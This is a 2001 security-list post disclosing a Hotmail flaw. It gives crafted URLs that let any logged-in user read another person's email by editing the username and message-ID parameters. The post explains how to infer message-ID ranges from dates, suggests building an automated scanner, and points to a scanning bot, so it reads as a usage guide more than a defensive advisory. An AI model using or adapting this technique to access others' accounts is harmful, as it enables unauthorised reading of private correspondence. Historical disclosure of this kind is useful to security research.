Hotmail message view exploit

[[Digital-Vortex]@securityfocus.com <root () root-core com>]

exploit lets you view e-mails from other peoples acccounts


---=[ Three Steps To View Someones Emails In Hotmail ]=---

(Tested with Internet Explorer 5)

To view full email from some elses account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view specific message from specific user:

   
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
   or
   
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

   From that link change values:
   MSG943322803%2e16 (Message id number, its simply a counter. %2e=.)
   username          (Hotmail account name to view)

   (remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
   (remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.)
 
3. Done. If you entered correct message number & that user has it you will see it. :)
   (Test it with your own other hotmail account messages first to get the idea working.)


---=[ ideas and comments for improved viewing / scan ]---

Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan given range of messages from specific user name.
(You need to build it to work with IE, as you must be
 logged in hotmail when you want to view messages..)

It also helps to know that from the message numbers,
in you own hotmail inbox,you can see about what time
is what message number been used. eg:

MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0  arrived on 04.12.2000.

So you dont need to scan as many message addresses
when you know from which range you are looking at.

(Check out Hotmail Scanner Bot aka. hobo for automatic scanning.)

Test messages: (Login to hotmail,then use links to view message from my test account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26raw%3d0%26login%3djokutesti99%26domain%3dhotmail%2ecom

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26login%3djokutesti99%26domain%3dhotmail%2ecom

---=[............ Research by wAwAsAn4 ..............]=---
---=[........... wAwAsAn4 () root-core com .............]=---
---=[................. 17.08.2001 ...................]=---


www.root-core.com

==
[Digital-Vortex]
Webmaster
www.root-core.com

_____________________________________________________________
[Root-Core] - [www.root-core.com] - Free E-mail